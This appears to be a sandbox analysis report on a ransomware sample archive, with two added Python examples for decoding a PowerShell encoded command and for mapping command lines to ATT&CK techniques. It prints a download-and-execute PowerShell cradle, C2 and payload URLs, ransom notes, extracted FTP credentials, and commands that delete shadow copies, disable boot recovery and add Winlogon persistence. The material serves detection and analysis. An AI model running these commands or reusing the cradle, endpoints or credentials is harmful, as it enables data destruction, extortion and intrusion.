Analysis

  • max time kernel
    279s
  • max time network
    282s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240802-en
  • resource tags

    arch:x64, arch:x86, image:win10v2004-20240802-en, locale:en-us, os:windows10-2004-x64, system
  • submitted
    02-10-2024 18:06

General

  • Target

    RNSM00468.7z

  • Size

    103.3MB

  • MD5

    c2df2a193d75d2ebcdaaa803a9e02d2c

  • SHA1

    334668dc9d0cd98412cbe7c454080ec77bb840af

  • SHA256

    d5789e5e8acb837cf697c55826769bbe7ca8b537f74924452ef5451865a99887

  • SHA512

    90db54b7f56dba7f085315b9aa7c194aff19ec3f0650c578919be2fad93bc749e48fe427c0ff4b6a6aeeb49e26ef855f2fa0429767c90aa3fec788652806c107

  • SSDEEP

    3145728:e4rPS3CLAi1kjT2dM/aiCj/WPb+uX4lNzid:riK1+IKPylNWd

Malware Config

Extracted

  • Language

    ps1

  • Deobfuscated URLs (ps1.dropper)

    https://cdn.discordapp.com/attachments/880265796767608892/882377555729063987/New_Text_Document.txt
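
The URL above is what the -enc argument passed to powershell.exe (PID 5608 in the process tree) decodes to. The Python below is an added example and not part of the sandbox report: it decodes a -EncodedCommand blob (base64 over the UTF-16LE bytes of the script, not UTF-8), pulls the URLs out of the recovered script, and flags the IEX/DownloadString download-cradle pattern. ENCODED is copied verbatim from the process tree; the function names are this example's own.

```python
"""Decode a PowerShell -EncodedCommand blob and extract what it reaches for.

Added example, not part of the sandbox report.  ENCODED is copied verbatim
from the powershell.exe (PID 5608) entry in the report's process tree; the
function names are this example's own.
"""
import base64
import re
from typing import List

ENCODED = "aQBlAHgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAKQAuAEQAbwB3AG4AbABvAGEAZABTAHQAcgBpAG4AZwAoACcAaAB0AHQAcABzADoALwAvAGMAZABuAC4AZABpAHMAYwBvAHIAZABhAHAAcAAuAGMAbwBtAC8AYQB0AHQAYQBjAGgAbQBlAG4AdABzAC8AOAA4ADAAMgA2ADUANwA5ADYANwA2ADcANgAwADgAOAA5ADIALwA4ADgAMgAzADcANwA1ADUANQA3ADIAOQAwADYAMwA5ADgANwAvAE4AZQB3AF8AVABlAHgAdABfAEQAbwBjAHUAbQBlAG4AdAAuAHQAeAB0ACcAKQA="

# Anything that looks like an http(s) URL, stopping at quotes, parentheses
# and whitespace so the PowerShell string delimiters are not swallowed.
URL_RE = re.compile(r"https?://[^\s'\"()]+", re.IGNORECASE)


def decode_encoded_command(blob: str) -> str:
    """Recover the script behind powershell.exe -EncodedCommand.

    PowerShell base64-encodes the UTF-16LE bytes of the script.  Decoding the
    bytes as UTF-8 instead yields 'i\\x00e\\x00x\\x00 ...', which is why naive
    string matching on the raw argument misses the payload.
    """
    raw = base64.b64decode(blob, validate=True)
    if len(raw) % 2:
        raise ValueError("odd byte count: not a UTF-16LE encoded command")
    return raw.decode("utf-16-le")


def encode_command(script: str) -> str:
    """Inverse of decode_encoded_command, useful to confirm a round trip."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


def extract_urls(script: str) -> List[str]:
    """Return every URL referenced in the decoded script, in order."""
    return URL_RE.findall(script)


def is_download_cradle(script: str) -> bool:
    """Flag the classic stager: IEX/Invoke-Expression fed by a web download."""
    low = script.lower()
    executes = "iex" in low or "invoke-expression" in low
    downloads = "downloadstring" in low or "webclient" in low or "invoke-webrequest" in low
    return executes and downloads


if __name__ == "__main__":
    script = decode_encoded_command(ENCODED)
    print(script)
    print(extract_urls(script))
    print("download cradle:", is_download_cradle(script))
```

The short form -enc is only one of several prefixes PowerShell accepts for -EncodedCommand (-e, -ec, -en and longer ones all work), so detection logic should match on the prefix rather than on the literal -enc.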

Extracted

Family

djvu

C2

http://astdg.top/fhsgtsspen6/get.php

Attributes
  • extension

    .hoop

  • offline_id

    922IaqlBU1I6IKX6eTDABuH3amHHwoa5qUSb8vt1

  • payload_url

    http://securebiz.org/dl/build2.exe

    http://astdg.top/files/1/build3.exe

  • ransomnote

    ATTENTION! Don't worry, you can return all your files! All your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key. The only method of recovering files is to purchase decrypt tool and unique key for you. This software will decrypt all your encrypted files. What guarantees you have? You can send one of your encrypted file from your PC and we decrypt it for free. But we can decrypt only 1 file for free. File must not contain valuable information. You can get and look video overview decrypt tool: https://we.tl/t-I6qIbIYiz9 Price of private key and decrypt software is $980. Discount 50% available if you contact us first 72 hours, that's price for you is $490. Please note that you'll never restore your data without payment. Check your e-mail "Spam" or "Junk" folder if you don't get answer more than 6 hours. To get this software you need write on our e-mail: [email protected] Reserve e-mail address to contact us: [email protected] Your personal ID: 0326gDrgo

rsa_pubkey.plain

Extracted

Path

C:\Users\Default\Saved Games\GET_YOUR_FILES_BACK.txt

Family

avoslocker

Ransom Note
Attention! Your files have been encrypted using AES-256. We highly suggest not shutting down your computer in case encryption process is not finished, as your files may get corrupted. In order to decrypt your files, you must pay for the decryption key & application. You may do so by visiting us at http://avosjon4pfh3y7ew3jdwz6ofw7lljcxlbk7hcxxmnxlh5kvf2akcqjad.onion. This is an onion address that you may access using Tor Browser which you may download at https://www.torproject.org/download/ Details such as pricing, how long before the price increases and such will be available to you once you enter your ID presented to you below in this note in our website. Contact us soon, because those who don't have their data leaked in our press release blog and the price they'll have to pay will go up significantly. The corporations whom don't pay or fail to respond in a swift manner can be found in our blog, accessible at http://avosqxh72b5ia23dl5fgwcpndkctuzqvh2iefk5imp3pi5gfhel5klad.onion Your ID: 3276b4d5d73dc9de228691c8193c374f5c83ba83341cf9405130e0095f60437b
URLs

http://avosjon4pfh3y7ew3jdwz6ofw7lljcxlbk7hcxxmnxlh5kvf2akcqjad.onion

http://avosqxh72b5ia23dl5fgwcpndkctuzqvh2iefk5imp3pi5gfhel5klad.onion

Extracted

Path

C:\ProgramData\Mozilla-1de4eec8-1241-4177-a864-e594e8d1fb38\updates\308046B0AF4A39CB\ReadMe.txt

Ransom Note
Gentlemen! Your business is at serios risk . There is a significant hole in the security system of your company. We have easily penetrated your network. You should thank the Lord for being hacked by serios people not some stupid schoolboys or dangerous punks. They can damage all your important data just for fun. All files on each host in the network have been encrypted with a strong algorithm Now your files are crypted with the strongest millitary algorithms RSA4096 and AES-256. No one can help you to restore files without our special decoder. Photorec, RannoDecryptor etc. repair tools Are useless and can destroy your files irreversibly. If you want to restore your files write to emails (contacts are at the bottom of the sheet ) and attach 2 encrypted files (Less than 5 Mb each, non-archived and your files should not contain valuable information (Databases, backups, large excel sheets, etc. )) You will receive decrypted samples and our conditions how to get the decoder. Please don't forget to write the name of your company in the subject of your e-mail. You have to pay for decryption in Bitcoins. The final price depends on how fast you write to us. Every day of delay will cost you additional BTC Nothing personal just business As soon as we get bitcoins you'll get all your decrypted data back. Moreover you will get instructions how to close the hole in security and how to avoid such problems in the future we will recommend you special software that makes the most problems to hackers. Attention! One more time ! Do not rename encrypted files. Do not try to decrypt your data using third party software. P.S. Remember, we are not scammers. We dont need your files and your information. But after 2 weeks all your files and keys will be deleted automatically. Just send a request immediately after infection. All data will be restored absolutely. Your warranty - decrypted samples. Contact emails Primary email : [email protected] Secondary email : [email protected]

Extracted

Family

agenttesla

Credentials

  • Protocol:
    ftp
  • Host:
    ftp://ftp.hdconstruct.ro/
  • Port:
    21
  • Username:
    [email protected]
  • Password:
    Z7p[d6+Oe!0i^C85CQ]uD68jNN@ossy~wH-(ie^9O2(0011

Signatures

  • AgentTesla

    Agent Tesla is a .NET-based information stealer and remote access tool (RAT); it harvests credentials from browsers, mail and FTP clients and exfiltrates them over SMTP, FTP or HTTP.

  • Avoslocker Ransomware

    AvosLocker is a ransomware family first observed in late June and early July 2021.

  • Chaos

    Ransomware family first seen in June 2021.

  • Chaos Ransomware 4 IoCs
  • Detected Djvu ransomware 13 IoCs
  • Djvu Ransomware

    Ransomware which is a variant of the STOP family.

  • GandCrab payload 2 IoCs
  • Gandcrab

    GandCrab is a ransomware family that encrypts files on the victim's computer.

  • Modifies WinLogon for persistence 2 TTPs 1 IoCs
  • AgentTesla payload 1 IoCs
  • Deletes shadow copies 3 TTPs

    Ransomware often targets backup files to inhibit system recovery.

  • Modifies boot configuration data using bcdedit 1 TTPs 2 IoCs
  • Renames multiple (164) files with added filename extension

    This suggests ransomware activity of encrypting all the files on the system.

  • Renames multiple (171) files with added filename extension

    This suggests ransomware activity of encrypting all the files on the system.

  • Renames multiple (71) files with added filename extension

    This suggests ransomware activity of encrypting all the files on the system.

  • Blocklisted process makes network request 1 IoCs
  • Deletes backup catalog 3 TTPs 1 IoCs

    Uses wbadmin.exe to inhibit system recovery.

  • Checks computer location settings 2 TTPs 8 IoCs

    Looks up the country code configured in the registry, likely a geofence check.

  • Drops startup file 14 IoCs
  • Executes dropped EXE 30 IoCs
  • Loads dropped DLL 37 IoCs
  • Modifies file permissions 1 TTPs 1 IoCs
  • Obfuscated with Agile.Net obfuscator 2 IoCs

    Detects use of the Agile.Net commercial obfuscator, which is capable of entity renaming and control flow obfuscation.

  • Reads WinSCP keys stored on the system 2 TTPs

    Tries to access WinSCP stored sessions.

  • Reads data files stored by FTP clients 2 TTPs

    Tries to access configuration files associated with programs like FileZilla.

  • Reads user/profile data of local email clients 2 TTPs

    Email clients store some user data on disk where infostealers will often target it.

  • Reads user/profile data of web browsers 3 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Unsecured Credentials: Credentials In Files 1 TTPs

    Steal credentials from unsecured files.

  • Accesses Microsoft Outlook profiles 1 TTPs 3 IoCs
  • Adds Run key to start application 2 TTPs 4 IoCs
  • Drops desktop.ini file(s) 34 IoCs
  • Enumerates connected drives 3 TTPs 23 IoCs

    Attempts to read the root path of hard drives other than the default C: drive.

  • Looks up external IP address via web service 3 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Uses Tor communications 1 TTPs

    Malware can proxy its traffic through Tor for more anonymity.

  • Sets desktop wallpaper using registry 2 TTPs 1 IoCs
  • Suspicious use of SetThreadContext 3 IoCs
  • UPX packed file 3 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • Drops file in Program Files directory 43 IoCs
  • Detects Pyinstaller 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Program crash 1 IoCs
  • System Location Discovery: System Language Discovery 1 TTPs 26 IoCs

    Attempts to gather information about the system language of a victim in order to infer the geographical location of that host.

  • Checks SCSI registry key(s) 3 TTPs 10 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Interacts with shadow copies 3 TTPs 1 IoCs

    Shadow copies are often targeted by ransomware to inhibit system recovery.

  • Modifies registry class 5 IoCs
  • Opens file in notepad (likely ransom note) 2 IoCs
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 64 IoCs
  • Suspicious use of SendNotifyMessage 64 IoCs
  • Suspicious use of SetWindowsHookEx 11 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

  • Uses Volume Shadow Copy service COM API

    The Volume Shadow Copy service is used to manage backups/snapshots.

  • outlook_office_path 1 IoCs
  • outlook_win_path 1 IoCs
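
Several of the signatures above (Deletes shadow copies, Modifies boot configuration data using bcdedit, Deletes backup catalog, Modifies WinLogon for persistence, Modifies file permissions, Blocklisted process makes network request) correspond to specific command lines in the process tree that follows. The Python below is an added example and not part of the sandbox report: it runs a small set of regex rules over those command lines (copied from the tree, plus two constructed benign ones for contrast) and maps each hit to an ATT&CK technique. The rule names and the technique mapping are this example's own.

```python
"""Map ransomware command lines to ATT&CK techniques.

Added example, not part of the sandbox report.  Rule names and the technique
mapping are this example's own; the sample command lines are copied from the
report's process tree, plus two constructed benign ones for contrast.
"""
import re
from typing import Dict, List, Set, Tuple

# (rule name, ATT&CK technique, regex applied to the lower-cased command line)
RULES: List[Tuple[str, str, str]] = [
    ("vssadmin_delete_shadows", "T1490",
     r"\bvssadmin(?:\.exe)?\s+delete\s+shadows\b"),
    ("wmic_shadowcopy_delete", "T1490",
     r"\bwmic(?:\.exe)?\s+shadowcopy\s+delete\b"),
    ("bcdedit_recovery_disabled", "T1490",
     r"\bbcdedit(?:\.exe)?\s+/set\s+\{default\}\s+recoveryenabled\s+no\b"),
    ("bcdedit_ignore_boot_failures", "T1490",
     r"\bbcdedit(?:\.exe)?\s+/set\s+\{default\}\s+bootstatuspolicy\s+ignoreallfailures\b"),
    ("wbadmin_delete_catalog", "T1490",
     r"\bwbadmin(?:\.exe)?\s+delete\s+catalog\b"),
    ("winlogon_shell_persistence", "T1547.004",
     r"currentversion\\winlogon.*\s/v\s+\"?shell\"?\s"),
    ("icacls_deny_everyone", "T1222.001",
     r"\bicacls(?:\.exe)?\s.*\s/deny\s+\*?s-1-1-0:"),
    ("powershell_encoded_command", "T1059.001",
     # -e, -ec, -en, -enc ... are all accepted prefixes of -EncodedCommand
     r"\bpowershell(?:\.exe)?\b.*\s-e(?:c|n|nc|ncoded|ncodedcommand)?\s+[a-z0-9+/=]{16,}"),
]
COMPILED = [(name, tech, re.compile(rx)) for name, tech, rx in RULES]


def classify(cmdline: str) -> List[Dict[str, str]]:
    """Return every rule that fires on one command line.

    A parent such as `cmd.exe /C vssadmin ... & wmic ...` fires twice, which is
    intentional: the child processes may never be logged if the cmd.exe
    invocation is blocked, and the parent alone is enough to alert on.
    """
    low = cmdline.lower()
    return [{"rule": name, "technique": tech}
            for name, tech, rx in COMPILED if rx.search(low)]


def techniques_in_tree(tree: List[Tuple[int, str]]) -> Dict[str, Set[str]]:
    """Aggregate hits across a whole process tree, keyed by ATT&CK technique.

    Ransomware typically fires several distinct T1490 rules within seconds of
    each other; scoring on the number of distinct rules per technique is more
    robust than alerting on any single command, because `vssadmin delete
    shadows` alone does occur in legitimate backup maintenance.
    """
    out: Dict[str, Set[str]] = {}
    for _pid, cmd in tree:
        for hit in classify(cmd):
            out.setdefault(hit["technique"], set()).add(hit["rule"])
    return out


# Constructed sample: command lines copied from the report's process tree
# (PIDs as reported; the -enc blob is the prefix of the one from PID 5608),
# plus two benign administrative commands with made-up PIDs.
SAMPLE_TREE: List[Tuple[int, str]] = [
    (468,  r'"C:\Windows\System32\cmd.exe" /C vssadmin delete shadows /all /quiet & wmic shadowcopy delete'),
    (7048, r'vssadmin delete shadows /all /quiet'),
    (5632, r'wmic shadowcopy delete'),
    (6004, r'bcdedit /set {default} bootstatuspolicy ignoreallfailures'),
    (6772, r'bcdedit /set {default} recoveryenabled no'),
    (6576, r'wbadmin delete catalog -quiet'),
    (5856, r'REG ADD "HKCU\Software\Microsoft\Windows NT\CurrentVersion\Winlogon" /f /v "Shell" /t REG_SZ /d "explorer.exe,C:\Users\Admin\AppData\Roaming\MAINPROC.exe,"'),
    (6644, r'icacls "C:\Users\Admin\AppData\Local\2e5a1121-e777-444f-89f1-76f96316f33c" /deny *S-1-1-0:(OI)(CI)(DE,DC)'),
    (5608, r'"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -enc aQBlAHgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAE4AZQB0'),
    (9001, r'vssadmin list shadows'),        # benign, constructed
    (9002, r'bcdedit /enum {default}'),      # benign, constructed
]

if __name__ == "__main__":
    for technique, rules in sorted(techniques_in_tree(SAMPLE_TREE).items()):
        print(technique, sorted(rules))
```

Running the block against the sample tree reports five distinct T1490 rules plus one hit each for T1547.004, T1222.001 and T1059.001, while the two benign commands match nothing. In production the same rules belong on process-creation telemetry (Sysmon event 1 or Windows 4688 with command-line logging enabled), keyed by parent PID so the burst can be tied back to the dropper.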

Processes

  • C:\Windows\system32\cmd.exe
    cmd /c C:\Users\Admin\AppData\Local\Temp\RNSM00468.7z
    1⤵
    • Modifies registry class
    PID:1856
  • C:\Windows\system32\OpenWith.exe
    C:\Windows\system32\OpenWith.exe -Embedding
    1⤵
    • Modifies registry class
    • Suspicious use of SetWindowsHookEx
    PID:4436
  • C:\Windows\System32\rundll32.exe
    C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
    1⤵
      PID:3472
    • C:\Program Files\7-Zip\7zFM.exe
      "C:\Program Files\7-Zip\7zFM.exe" "C:\Users\Admin\AppData\Local\Temp\RNSM00468.7z"
      1⤵
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of FindShellTrayWindow
      PID:4880
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
      1⤵
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:1916
      • C:\Windows\system32\cmd.exe
        "C:\Windows\system32\cmd.exe"
        2⤵
        • Suspicious use of WriteProcessMemory
        PID:2608
        • C:\Users\Admin\Desktop\00468\HEUR-Trojan-Ransom.MSIL.Agent.gen-1ba5ab55b7212ba92a9402677e30e45f12d98a98f78cdcf5864a67d6c264d053.exe
          HEUR-Trojan-Ransom.MSIL.Agent.gen-1ba5ab55b7212ba92a9402677e30e45f12d98a98f78cdcf5864a67d6c264d053.exe
          3⤵
          • Checks computer location settings
          • Executes dropped EXE
          • Suspicious use of AdjustPrivilegeToken
          PID:4352
          • C:\Users\Admin\AppData\Roaming\svchost.exe
            "C:\Users\Admin\AppData\Roaming\svchost.exe"
            4⤵
            • Checks computer location settings
            • Drops startup file
            • Executes dropped EXE
            • Drops desktop.ini file(s)
            • Sets desktop wallpaper using registry
            • Modifies registry class
            • Suspicious behavior: AddClipboardFormatListener
            PID:7060
            • C:\Windows\System32\cmd.exe
              "C:\Windows\System32\cmd.exe" /C vssadmin delete shadows /all /quiet & wmic shadowcopy delete
              5⤵
                PID:468
                • C:\Windows\system32\vssadmin.exe
                  vssadmin delete shadows /all /quiet
                  6⤵
                  • Interacts with shadow copies
                  PID:7048
                • C:\Windows\System32\Wbem\WMIC.exe
                  wmic shadowcopy delete
                  6⤵
                    PID:5632
                • C:\Windows\System32\cmd.exe
                  "C:\Windows\System32\cmd.exe" /C bcdedit /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no
                  5⤵
                    PID:5476
                    • C:\Windows\system32\bcdedit.exe
                      bcdedit /set {default} bootstatuspolicy ignoreallfailures
                      6⤵
                      • Modifies boot configuration data using bcdedit
                      PID:6004
                    • C:\Windows\system32\bcdedit.exe
                      bcdedit /set {default} recoveryenabled no
                      6⤵
                      • Modifies boot configuration data using bcdedit
                      PID:6772
                  • C:\Windows\System32\cmd.exe
                    "C:\Windows\System32\cmd.exe" /C wbadmin delete catalog -quiet
                    5⤵
                      PID:6744
                      • C:\Windows\system32\wbadmin.exe
                        wbadmin delete catalog -quiet
                        6⤵
                        • Deletes backup catalog
                        PID:6576
                    • C:\Windows\system32\NOTEPAD.EXE
                      "C:\Windows\system32\NOTEPAD.EXE" C:\Users\Admin\AppData\Roaming\README.txt
                      5⤵
                      • Opens file in notepad (likely ransom note)
                      PID:7528
                • C:\Users\Admin\Desktop\00468\HEUR-Trojan-Ransom.MSIL.Agent.gen-b103fc649787eb1f6121df8174d0f16aaac736fb53f5f078d312871189285956.exe
                  HEUR-Trojan-Ransom.MSIL.Agent.gen-b103fc649787eb1f6121df8174d0f16aaac736fb53f5f078d312871189285956.exe
                  3⤵
                  • Checks computer location settings
                  • Executes dropped EXE
                  • Suspicious use of AdjustPrivilegeToken
                  PID:1152
                  • C:\Users\Admin\AppData\Roaming\svchost.exe
                    "C:\Users\Admin\AppData\Roaming\svchost.exe"
                    4⤵
                    • Executes dropped EXE
                    PID:6524
                • C:\Users\Admin\Desktop\00468\HEUR-Trojan-Ransom.MSIL.Blocker.gen-a2b24057a5bb69f39216c44bc0400a670790c88d6a6016462e4d07db43722bb8.exe
                  HEUR-Trojan-Ransom.MSIL.Blocker.gen-a2b24057a5bb69f39216c44bc0400a670790c88d6a6016462e4d07db43722bb8.exe
                  3⤵
                  • Checks computer location settings
                  • Executes dropped EXE
                  • Adds Run key to start application
                  • Suspicious use of WriteProcessMemory
                  PID:740
                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Test-Connection outlook.com
                    4⤵
                    • Suspicious use of AdjustPrivilegeToken
                    PID:3392
                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Test-Connection outlook.com
                    4⤵
                    • Suspicious use of AdjustPrivilegeToken
                    PID:3188
                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Test-Connection outlook.com
                    4⤵
                    • Suspicious use of AdjustPrivilegeToken
                    PID:3244
                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Test-Connection outlook.com
                    4⤵
                    • Suspicious use of AdjustPrivilegeToken
                    PID:4740
                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Test-Connection outlook.com
                    4⤵
                    • Suspicious use of AdjustPrivilegeToken
                    PID:2856
                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Test-Connection outlook.com
                    4⤵
                    • Suspicious use of AdjustPrivilegeToken
                    PID:3496
                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Test-Connection outlook.com
                    4⤵
                    • Suspicious use of AdjustPrivilegeToken
                    PID:4220
                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Test-Connection outlook.com
                    4⤵
                    • Suspicious use of AdjustPrivilegeToken
                    PID:1376
                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -enc aQBlAHgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAKQAuAEQAbwB3AG4AbABvAGEAZABTAHQAcgBpAG4AZwAoACcAaAB0AHQAcABzADoALwAvAGMAZABuAC4AZABpAHMAYwBvAHIAZABhAHAAcAAuAGMAbwBtAC8AYQB0AHQAYQBjAGgAbQBlAG4AdABzAC8AOAA4ADAAMgA2ADUANwA5ADYANwA2ADcANgAwADgAOAA5ADIALwA4ADgAMgAzADcANwA1ADUANQA3ADIAOQAwADYAMwA5ADgANwAvAE4AZQB3AF8AVABlAHgAdABfAEQAbwBjAHUAbQBlAG4AdAAuAHQAeAB0ACcAKQA=
                    4⤵
                    • Blocklisted process makes network request
                    PID:5608
                • C:\Users\Admin\Desktop\00468\HEUR-Trojan-Ransom.MSIL.Blocker.gen-a3a1dcd338b4e5078dd0a853fa0b84de141d680ea984cd3d914ebc23fc72756d.exe
                  HEUR-Trojan-Ransom.MSIL.Blocker.gen-a3a1dcd338b4e5078dd0a853fa0b84de141d680ea984cd3d914ebc23fc72756d.exe
                  3⤵
                  • Executes dropped EXE
                  • System Location Discovery: System Language Discovery
                  • Suspicious use of SetWindowsHookEx
                  PID:2808
                • C:\Users\Admin\Desktop\00468\HEUR-Trojan-Ransom.MSIL.Blocker.gen-a75a498d8ec7bf58a12c07fac6ad98c5581a422cca03fa3ca87b01677f37247e.exe
                  HEUR-Trojan-Ransom.MSIL.Blocker.gen-a75a498d8ec7bf58a12c07fac6ad98c5581a422cca03fa3ca87b01677f37247e.exe
                  3⤵
                  • Executes dropped EXE
                  • System Location Discovery: System Language Discovery
                  • Suspicious use of SetWindowsHookEx
                  PID:700
                • C:\Users\Admin\Desktop\00468\HEUR-Trojan-Ransom.MSIL.Blocker.gen-c2c202bf857e481c10ea66181f394b5c890f3d7e5ba13126d7ea5b8d11f3220f.exe
                  HEUR-Trojan-Ransom.MSIL.Blocker.gen-c2c202bf857e481c10ea66181f394b5c890f3d7e5ba13126d7ea5b8d11f3220f.exe
                  3⤵
                  • Drops startup file
                  • Executes dropped EXE
                  • Adds Run key to start application
                  PID:3584
                • C:\Users\Admin\Desktop\00468\HEUR-Trojan-Ransom.MSIL.Blocker.gen-d3635e7428a16515d98ec564145b363802dfa54418ac6221a638651732af4e2b.exe
                  HEUR-Trojan-Ransom.MSIL.Blocker.gen-d3635e7428a16515d98ec564145b363802dfa54418ac6221a638651732af4e2b.exe
                  3⤵
                  • Checks computer location settings
                  • Executes dropped EXE
                  • System Location Discovery: System Language Discovery
                  • Suspicious use of AdjustPrivilegeToken
                  PID:672
                  • C:\Windows\SysWOW64\cmd.exe
                    "cmd.exe" /c REG ADD "HKCU\Software\Microsoft\Windows NT\CurrentVersion\Winlogon" /f /v "Shell" /t REG_SZ /d "explorer.exe,C:\Users\Admin\AppData\Roaming\MAINPROC.exe,"
                    4⤵
                    • System Location Discovery: System Language Discovery
                    PID:5888
                    • C:\Windows\SysWOW64\reg.exe
                      REG ADD "HKCU\Software\Microsoft\Windows NT\CurrentVersion\Winlogon" /f /v "Shell" /t REG_SZ /d "explorer.exe,C:\Users\Admin\AppData\Roaming\MAINPROC.exe,"
                      5⤵
                      • Modifies WinLogon for persistence
                      • System Location Discovery: System Language Discovery
                      PID:5856
                  • C:\Users\Admin\AppData\Roaming\MAINPROC.exe
                    "C:\Users\Admin\AppData\Roaming\MAINPROC.exe"
                    4⤵
                    • Executes dropped EXE
                    • System Location Discovery: System Language Discovery
                    PID:7280
                • C:\Users\Admin\Desktop\00468\HEUR-Trojan-Ransom.MSIL.Blocker.gen-f4a7d3a3e578388ce1bc0302711d7082e7bc9aa4e0299db7b047f6e93d0fa003.exe
                  HEUR-Trojan-Ransom.MSIL.Blocker.gen-f4a7d3a3e578388ce1bc0302711d7082e7bc9aa4e0299db7b047f6e93d0fa003.exe
                  3⤵
                  • Executes dropped EXE
                  • Suspicious use of SetThreadContext
                  • System Location Discovery: System Language Discovery
                  • Suspicious use of AdjustPrivilegeToken
                  PID:4180
                  • C:\Users\Admin\Desktop\00468\HEUR-Trojan-Ransom.MSIL.Blocker.gen-f4a7d3a3e578388ce1bc0302711d7082e7bc9aa4e0299db7b047f6e93d0fa003.exe
                    "C:\Users\Admin\Desktop\00468\HEUR-Trojan-Ransom.MSIL.Blocker.gen-f4a7d3a3e578388ce1bc0302711d7082e7bc9aa4e0299db7b047f6e93d0fa003.exe"
                    4⤵
                    • Executes dropped EXE
                    • Accesses Microsoft Outlook profiles
                    • System Location Discovery: System Language Discovery
                    • outlook_office_path
                    • outlook_win_path
                    PID:6800
                • C:\Users\Admin\Desktop\00468\HEUR-Trojan-Ransom.MSIL.Gen.gen-ebd09856f75a766a48ff636787d345c64bf61d374c69f8f299643b83a02f7123.exe
                  HEUR-Trojan-Ransom.MSIL.Gen.gen-ebd09856f75a766a48ff636787d345c64bf61d374c69f8f299643b83a02f7123.exe
                  3⤵
                  • Executes dropped EXE
                  • Suspicious use of SetWindowsHookEx
                  PID:3508
                • C:\Users\Admin\Desktop\00468\HEUR-Trojan-Ransom.Python.Agent.gen-d38fd7b985618045a015257f76b115ad1c751ad9d8003d9c41af6f9fa8d7c918.exe
                  HEUR-Trojan-Ransom.Python.Agent.gen-d38fd7b985618045a015257f76b115ad1c751ad9d8003d9c41af6f9fa8d7c918.exe
                  3⤵
                  • Executes dropped EXE
                  • System Location Discovery: System Language Discovery
                  • Suspicious use of WriteProcessMemory
                  PID:1820
                  • C:\Users\Admin\Desktop\00468\HEUR-Trojan-Ransom.Python.Agent.gen-d38fd7b985618045a015257f76b115ad1c751ad9d8003d9c41af6f9fa8d7c918.exe
                    HEUR-Trojan-Ransom.Python.Agent.gen-d38fd7b985618045a015257f76b115ad1c751ad9d8003d9c41af6f9fa8d7c918.exe
                    4⤵
                    • Executes dropped EXE
                    • Loads dropped DLL
                    • System Location Discovery: System Language Discovery
                    PID:5596
                • C:\Users\Admin\Desktop\00468\HEUR-Trojan-Ransom.Win32.Blocker.gen-57f67d542cc71d54e87a4416a65945b1315def54b9a0077d2f6049fefb9bdf05.exe
                  HEUR-Trojan-Ransom.Win32.Blocker.gen-57f67d542cc71d54e87a4416a65945b1315def54b9a0077d2f6049fefb9bdf05.exe
                  3⤵
                  • Executes dropped EXE
                  • System Location Discovery: System Language Discovery
                  • Suspicious use of AdjustPrivilegeToken
                  PID:5716
                • C:\Users\Admin\Desktop\00468\HEUR-Trojan-Ransom.Win32.Blocker.pef-a59ca7e47a756d325818eb3b6ae1e423ffe1847131d7be1795a81522f7c64d3f.exe
                  HEUR-Trojan-Ransom.Win32.Blocker.pef-a59ca7e47a756d325818eb3b6ae1e423ffe1847131d7be1795a81522f7c64d3f.exe
                  3⤵
                  • Checks computer location settings
                  • Executes dropped EXE
                  • System Location Discovery: System Language Discovery
                  • Suspicious use of WriteProcessMemory
                  PID:5928
                  • C:\Users\Admin\AppData\Local\Temp\zbhnd.exe
                    "C:\Users\Admin\AppData\Local\Temp\zbhnd.exe"
                    4⤵
